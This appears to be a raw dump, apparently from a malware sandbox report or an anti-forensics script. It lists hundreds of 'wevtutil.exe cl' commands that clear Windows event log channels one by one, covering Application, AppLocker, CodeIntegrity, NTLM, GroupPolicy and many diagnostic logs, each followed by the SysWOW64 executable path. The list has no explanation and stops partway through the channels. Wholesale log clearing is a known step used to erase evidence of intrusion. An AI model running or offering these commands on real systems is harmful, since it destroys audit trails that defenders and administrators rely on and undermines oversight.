wevtutil.exe cl "Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Application"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "DebugChannel"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "DirectShowFilterGraph"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "DirectShowPluginControl"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Els_Hyphenation/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "EndpointMapper"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "ForwardedEvents"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "HardwareEvents"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Internet Explorer"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Key Management Service"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "MF_MediaFoundationDeviceProxy"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Media Center"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "MediaFoundationDeviceProxy"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "MediaFoundationPerformance"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "MediaFoundationPipeline"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "MediaFoundationPlatform"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-IE/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-IEDVTOOL/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-IEFRAME/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-JSDumpHeap/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-PerfTrack-IEFRAME/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-PerfTrack-MSHTML/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ADSI/Debug"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-API-Tracing/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ATAPort/General"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ATAPort/SATA-LPM"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ActionQueue/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AltTab/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppID/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppLocker/EXE and DLL"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppLocker/MSI and Script"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Admin"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Debug"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application-Experience/Problem-Steps-Recorder"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory/Debug"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Telemetry"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Audio/CaptureMonitor"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Audio/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Audio/Performance"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Audit/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Authentication User Interface/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AxInstallService/Log"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Backup"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Biometrics/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Admin"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Bits-Client/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Bits-Client/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Bluetooth-MTPEnum/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BranchCache/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BranchCacheEventProvider/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CAPI2/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CDROM/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-COM/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-COMRuntime/Tracing"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Calculator/Debug"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Calculator/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CertPoleEng/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ClearTypeTextTuner/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CmiSetup/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Verbose"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ComDlg32/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ComDlg32/Debug"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Client/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Server/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CredUI/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Crypto-RNG/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-D3D10Level9/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-D3D10Level9/PerfTiming"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DCLocator/Debug"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DNS-Client/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DUI/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DUSER/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DXGI/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DXGI/Logging"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DXP/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Debug"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Deplorch/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DeviceSync/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DeviceSync/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DeviceUx/Informational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DeviceUx/Performance"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Admin"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DhcpNap/Admin"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DhcpNap/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Admin"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DiagCpl/Debug"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Debug"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-MSDE/Debug"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Debug"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Debug"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-Perfhost/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scheduled/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Admin"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Debug"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Debug"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-TaskManager/Debug"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDC/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDI/Debug"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Debug"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack-Counters/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic/Loopback"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Direct3D10/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Direct3D10_1/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Direct3D11/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Direct3D11/Logging"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Direct3D11/PerfTiming"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DirectShow-KernelSupport/Performance"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DirectSound/Debug"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DirectWrite-FontCache/Tracing"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DirectWrite/Tracing"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Disk/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DiskDiagnostic/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticDataCollector/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticResolver/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Debug"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DisplaySwitch/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Documents/Performance"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DriverFrameworks-UserMode/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Performance"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DxpTaskRingtone/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DxpTaskSyncProvider/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EFS/Debug"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EapHost/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EapHost/Debug"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EapHost/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EaseOfAccess/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EventCollector/Debug"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EventCollector/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EventLog-WMIProvider/Debug"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EventLog/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EventLog/Debug"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-FMS/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-FMS/Debug"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-FMS/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-FailoverClustering-Client/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Fault-Tolerant-Heap/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Feedback-Service-TriggerProvider"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-FileInfoMinifilter/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Firewall-CPL/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Folder Redirection/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Forwarding/Debug"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Forwarding/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-GettingStarted/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-GroupPolicy/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HAL/Debug"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HealthCenter/Debug"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HealthCenter/Performance"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HealthCenterCPL/Performance"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Help/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel Performance/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HomeGroup Listener Service/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service Performance/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HomeGroup-ListenerService"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HotStart/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HttpService/Trace"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-IKE/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-IKEDBG/Debug"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-IPBusEnum/Tracing"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-IPSEC-SRV/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-International-RegionalOptionsControlPanel/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-International/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Debug"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Trace"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Acpi/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Boot/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-BootDiagnostics/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Disk/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Admin"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-File/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Memory/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Network/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Prefetch/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Process/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Processor-Power/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Registry/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Debug"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Errors"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Known Folders API Service"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-L2NA/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-LDAP-Client/Debug"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-LUA-ConsentUI/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Debug"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MCT/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MPS-CLNT/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MPS-DRV/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MPS-SRV/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MSPaint/Admin"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MSPaint/Debug"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MSPaint/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MUI/Admin"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MUI/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MUI/Debug"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MUI/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SinkWriter"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SourceReader"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/Transform"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MediaFoundation-PlayAPI/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MemoryDiagnostics-Results/Debug"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MobilityCenter/Performance"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-NCSI/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-NCSI/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-NDF-HelperClassDiscovery/Debug"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-NDIS-PacketCapture/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-NDIS/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-NDIS/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-NTLM/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-NWiFi/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Narrator/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-NetShell/Performance"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Network-and-Sharing-Center/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-NetworkAccessProtection/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-NetworkAccessProtection/WHC"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-NetworkLocationWizard/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-NetworkProfile/Diagnostic"

